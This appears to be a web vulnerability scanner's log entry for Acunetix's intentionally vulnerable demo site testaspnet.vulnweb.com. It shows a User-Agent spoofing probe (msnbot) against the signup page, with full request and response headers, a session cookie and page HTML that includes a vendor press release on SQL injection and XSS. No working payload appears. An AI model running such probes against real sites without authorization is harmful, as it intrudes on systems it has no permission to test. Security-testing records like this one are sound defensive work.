ICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 423 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:36 GMT Content-Length: 13173
Response Body - size: 13,173 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> 